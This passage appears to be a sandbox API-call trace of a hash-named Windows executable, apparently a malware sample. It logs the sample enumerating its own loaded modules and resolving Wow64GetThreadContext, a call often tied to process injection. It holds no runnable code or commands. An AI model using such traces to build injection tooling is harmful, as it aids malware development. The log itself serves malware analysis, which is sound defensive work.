GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0108.762] CoTaskMemFree (pv=0x6b7aa0) [0108.762] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.762] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0108.763] CoTaskMemFree (pv=0x6b7aa0) [0108.763] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x24c66d0, cb=0xc | out: lpmodinfo=0x24c66d0*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0108.763] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.763] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0108.764] CoTaskMemFree (pv=0x6b7aa0) [0108.764] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.764] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0108.764] CoTaskMemFree (pv=0x6b7aa0) [0108.764] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x24c87e4, cb=0xc | out: lpmodinfo=0x24c87e4*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0108.765] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.765] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0108.765] CoTaskMemFree (pv=0x6b7aa0) [0108.765] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.765] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0108.766] CoTaskMemFree (pv=0x6b7aa0) [0108.766] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x24ca918, cb=0xc | out: lpmodinfo=0x24ca918*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0108.766] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.766] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0108.767] CoTaskMemFree (pv=0x6b7aa0) [0108.767] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.767] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0108.767] CoTaskMemFree (pv=0x6b7aa0) [0108.767] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x24cca60, cb=0xc | out: lpmodinfo=0x24cca60*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0108.768] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.768] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0108.768] CoTaskMemFree (pv=0x6b7aa0) [0108.768] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.768] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0108.769] CoTaskMemFree (pv=0x6b7aa0) [0108.769] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x24ceb6c, cb=0xc | out: lpmodinfo=0x24ceb6c*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0108.769] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.769] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0108.770] CoTaskMemFree (pv=0x6b7aa0) [0108.770] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.770] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0108.770] CoTaskMemFree (pv=0x6b7aa0) [0108.770] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x24d0c78, cb=0xc | out: lpmodinfo=0x24d0c78*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0108.789] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.789] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0108.790] CoTaskMemFree (pv=0x6b7aa0) [0108.790] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.790] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0108.791] CoTaskMemFree (pv=0x6b7aa0) [0108.791] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x24d2e08, cb=0xc | out: lpmodinfo=0x24d2e08*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0108.792] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.792] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0108.792] CoTaskMemFree (pv=0x6b7aa0) [0108.792] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.792] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0108.793] CoTaskMemFree (pv=0x6b7aa0) [0108.793] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x24d4f14, cb=0xc | out: lpmodinfo=0x24d4f14*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0108.794] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.794] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0108.795] CoTaskMemFree (pv=0x6b7aa0) [0108.795] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.795] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0108.795] CoTaskMemFree (pv=0x6b7aa0) [0108.795] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x24d7018, cb=0xc | out: lpmodinfo=0x24d7018*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0108.796] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.796] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0108.797] CoTaskMemFree (pv=0x6b7aa0) [0108.797] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.797] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0108.798] CoTaskMemFree (pv=0x6b7aa0) [0108.798] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x24d9144, cb=0xc | out: lpmodinfo=0x24d9144*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0108.798] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.798] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0108.799] CoTaskMemFree (pv=0x6b7aa0) [0108.799] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.799] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0108.800] CoTaskMemFree (pv=0x6b7aa0) [0108.800] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x24db250, cb=0xc | out: lpmodinfo=0x24db250*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0108.801] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.801] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0108.801] CoTaskMemFree (pv=0x6b7aa0) [0108.804] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.804] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0108.805] CoTaskMemFree (pv=0x6b7aa0) [0108.805] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x24dd380, cb=0xc | out: lpmodinfo=0x24dd380*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0108.806] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.806] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0108.806] CoTaskMemFree (pv=0x6b7aa0) [0108.806] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.806] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0108.807] CoTaskMemFree (pv=0x6b7aa0) [0108.807] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x24df4b4, cb=0xc | out: lpmodinfo=0x24df4b4*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0108.808] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.808] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0108.809] CoTaskMemFree (pv=0x6b7aa0) [0108.809] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.809] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0108.810] CoTaskMemFree (pv=0x6b7aa0) [0108.810] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x24e165c, cb=0xc | out: lpmodinfo=0x24e165c*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0108.811] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.811] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0108.812] CoTaskMemFree (pv=0x6b7aa0) [0108.812] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.812] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0108.812] CoTaskMemFree (pv=0x6b7aa0) [0108.812] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x24e3760, cb=0xc | out: lpmodinfo=0x24e3760*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0108.813] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.813] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0108.814] CoTaskMemFree (pv=0x6b7aa0) [0108.814] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.814] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0108.815] CoTaskMemFree (pv=0x6b7aa0) [0108.815] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x24e58a0, cb=0xc | out: lpmodinfo=0x24e58a0*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0108.816] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.816] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0108.817] CoTaskMemFree (pv=0x6b7aa0) [0108.817] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.817] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0108.818] CoTaskMemFree (pv=0x6b7aa0) [0108.818] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x24e79b4, cb=0xc | out: lpmodinfo=0x24e79b4*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0108.819] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.819] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0108.820] CoTaskMemFree (pv=0x6b7aa0) [0108.820] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.820] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0108.821] CoTaskMemFree (pv=0x6b7aa0) [0108.821] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x24e9b50, cb=0xc | out: lpmodinfo=0x24e9b50*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0108.822] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.822] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0108.823] CoTaskMemFree (pv=0x6b7aa0) [0108.823] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.823] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0108.824] CoTaskMemFree (pv=0x6b7aa0) [0108.824] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x24ebd0c, cb=0xc | out: lpmodinfo=0x24ebd0c*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0108.825] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.825] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0108.826] CoTaskMemFree (pv=0x6b7aa0) [0108.826] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.826] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0108.827] CoTaskMemFree (pv=0x6b7aa0) [0108.827] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x24ede10, cb=0xc | out: lpmodinfo=0x24ede10*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0108.828] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.828] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0108.829] CoTaskMemFree (pv=0x6b7aa0) [0108.829] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.829] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0108.830] CoTaskMemFree (pv=0x6b7aa0) [0108.830] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x24eff14, cb=0xc | out: lpmodinfo=0x24eff14*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0108.831] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.831] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0108.832] CoTaskMemFree (pv=0x6b7aa0) [0108.832] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.832] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0108.839] CoTaskMemFree (pv=0x6b7aa0) [0108.839] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x24f2020, cb=0xc | out: lpmodinfo=0x24f2020*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0108.840] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.841] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0108.841] CoTaskMemFree (pv=0x6b7aa0) [0108.842] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.842] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0108.843] CoTaskMemFree (pv=0x6b7aa0) [0108.843] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x24f4238, cb=0xc | out: lpmodinfo=0x24f4238*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0108.844] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.844] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0108.845] CoTaskMemFree (pv=0x6b7aa0) [0108.845] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.845] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0108.846] CoTaskMemFree (pv=0x6b7aa0) [0108.846] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x24f634c, cb=0xc | out: lpmodinfo=0x24f634c*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0108.847] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.847] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0108.848] CoTaskMemFree (pv=0x6b7aa0) [0108.848] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.848] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0108.849] CoTaskMemFree (pv=0x6b7aa0) [0108.849] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x24f8478, cb=0xc | out: lpmodinfo=0x24f8478*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0108.850] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.850] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0108.852] CoTaskMemFree (pv=0x6b7aa0) [0108.852] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.852] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0108.853] CoTaskMemFree (pv=0x6b7aa0) [0108.853] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x24fa584, cb=0xc | out: lpmodinfo=0x24fa584*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0108.854] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.854] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0108.855] CoTaskMemFree (pv=0x6b7aa0) [0108.855] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.855] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0108.856] CoTaskMemFree (pv=0x6b7aa0) [0108.856] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x24fc698, cb=0xc | out: lpmodinfo=0x24fc698*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0108.857] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.857] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7aa0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0108.858] CoTaskMemFree (pv=0x6b7aa0) [0108.858] CoTaskMemAlloc (cb=0x804) returned 0x6b7aa0 [0108.858] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7aa0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0108.860] CoTaskMemFree (pv=0x6b7aa0) [0108.860] CloseHandle (hObject=0x32c) returned 1 [0108.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x19eac0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContext\x1a2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 21 [0108.861] GetProcAddress (hModule=0x76720000, lpProcName="Wow64GetThreadContext") returned 0x76763e30 [0108.863] GetCurrentProcessId () returned 0x139c [0108.863] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0108.863] EnumProcessModules (in: hProcess=0x32c, lphModule=0x2500888, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x2500888, lpcbNeeded=0x19eae0) returned 1 [0108.864] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x25009c8, cb=0xc | out: lpmodinfo=0x25009c8*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0108.864] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.864] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0108.865] CoTaskMemFree (pv=0x6b7648) [0108.865] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.865] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0108.865] CoTaskMemFree (pv=0x6b7648) [0108.865] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x2502bec, cb=0xc | out: lpmodinfo=0x2502bec*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 